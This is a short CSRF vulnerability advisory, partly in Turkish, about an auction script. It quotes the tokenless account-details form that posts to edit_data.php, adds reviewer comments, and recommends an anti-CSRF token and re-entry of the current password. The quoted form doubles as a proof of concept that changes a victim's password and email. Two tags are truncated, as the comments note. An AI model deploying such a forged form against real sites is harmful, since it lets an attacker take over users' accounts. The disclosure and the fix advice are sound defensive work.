< ------------------- header data start ------------------- >

#############################################################

# Application Name :Best Ebay Dbay Auction Script

# Vulnerability Type : XSRF (cross-site request forgery, also written CSRF)

# Infection : Uzaktan otomatik olarak user bilgileri degistirebilinir. (English: user details can be changed remotely and automatically.)

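# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir. (English: a session key (session token) should be added to the form, and the old password should be asked for.)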

# author : BUG RESEARCHERS//CWH1RLPOOL

#############################################################

< ------------------- header data end of ------------------- >
< -- bug code start -- >
<!--
  Form markup quoted by the advisory as the affected code: the account-details
  form, which POSTs to edit_data.php.
  What makes it forgeable across sites, judging only from the markup shown
  here: every field name is fixed and the form carries no per-session,
  unpredictable value, so a request built on another site is indistinguishable
  from one submitted by this form.
  The server-side handler is not part of this listing; presumably it relies on
  the session cookie alone (confirm against edit_data.php).
  Defensive fix, matching the advisory's own advice: a hidden anti-CSRF token
  bound to the session and verified server-side, plus re-entry of the current
  password before the password or e-mail address is changed. SameSite cookies
  and an Origin/Referer check are additional layers, not a replacement for
  the token.
-->
<FORM NAME=details ACTION=http://www.getaphpsite.com/demos/ebay/edit_data.php METHOD=POST>

<!-- New password and its confirmation; the form has no field for the current password. -->
<INPUT TYPE=password NAME=TPL_password SIZE=20 MAXLENGTH=20>
<INPUT TYPE=password NAME=TPL_repeat_password SIZE=20
<INPUT TYPE=text NAME=TPL_email SIZE=50 MAXLENGTH=50 VALUE=[email protected]>
<!-- NOTE(review): the TPL_repeat_password tag above and the TPL_address tag below have no closing angle bracket in this listing, probably truncated when the advisory was published; kept exactly as found. The e-mail VALUE looks like a placeholder left by e-mail obfuscation on the hosting page, not the original address. -->

<INPUT type=text name=TPL_birthdate size=10 maxlength=10 value=01/01/1990>
<INPUT TYPE=text NAME=TPL_address SIZE=40 MAXLENGTH=255
<INPUT TYPE=text NAME=TPL_city SIZE=25 MAXLENGTH=25 VALUE=asadasdas>
<INPUT TYPE=text NAME=TPL_prov SIZE=10 MAXLENGTH=10 VALUE=sadasd>
<INPUT TYPE=text NAME=TPL_zip SIZE=8 MAXLENGTH=6 VALUE=06850>
<INPUT TYPE=text NAME=TPL_phone SIZE=40 MAXLENGTH=40 VALUE=054154542524>
<!-- Newsletter preference radio buttons (values 1 and 2). -->
<input type=radio name=TPL_nletter value=1 CHECKED >
YES
<input type=radio name=TPL_nletter value=2 >
<input type=submit name=Input>
<input type=reset name=Input>
<!-- The only hidden field is the constant action=update. Nothing in the form is secret or tied to the session, which is the property an anti-CSRF token would supply. -->
<INPUT type=hidden NAME=action VALUE=update>

</FORM>
< -- bug code end of -- >